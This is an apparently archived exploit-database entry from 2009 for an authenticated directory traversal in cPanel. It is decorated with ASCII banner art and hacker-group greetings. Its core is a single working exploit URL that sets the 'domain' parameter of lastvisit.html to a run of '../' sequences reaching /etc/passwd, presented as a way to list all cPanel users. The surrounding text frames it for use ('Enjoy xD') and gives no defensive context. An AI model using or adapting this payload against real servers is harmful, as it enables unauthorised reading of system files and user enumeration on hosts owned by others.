[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)
# Published : 2009-06-29
# Author : SecurityRules
# Previous Title : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)
# Next Title : Bopup Communications Server 3.2.26.5460 Remote SYSTEM Exploit
+===================================================================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _/ _ _ / < |/_ _ _ _ /
_ _ _ _/ /___ / / __ | |) / | | / /
_ _ _ _/ /___ / / | __ || / | | / /
_______ _ _ 2_0_0_9 | | | / /____
/_ _ _ _ _ _ _ _/ _ _ _ / |__| __ |__|/_ _ _ _ _ R.I.P MichaelJackson !!!!!
+===================================================================================+
| |
| |
| CPANEL USER BYPASS |
| |
+===================================================================================+
| |
| Author.: Black Dream |
| Contact: Be5_at_HoTMail_dot_Fr |
| HoMe : www.sec-r1z.com |
| ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM |
+===================================================================================+
| |
| Script.: CPANEL |
| Home...: http://CPANEL.NET |
| |
+-----------------------------------------------------------------------------------+
| |
| [+] Exploit: |
| |
| http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../ etc/ passwd
| |
| |
| |
| |
| |
| [+] Now you see all cpanel[s] user[s] |
| |
| [+] Enjoy xD |
+-----------------------------------------------------------------------------------|
+===================================================================================+
| |
| Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0 |
| Linux-D3v1L And All #sec-r1z memb3rz!!!! |
+===================================================================================+
E0D|F
# www.Syue.com [2009-06-29]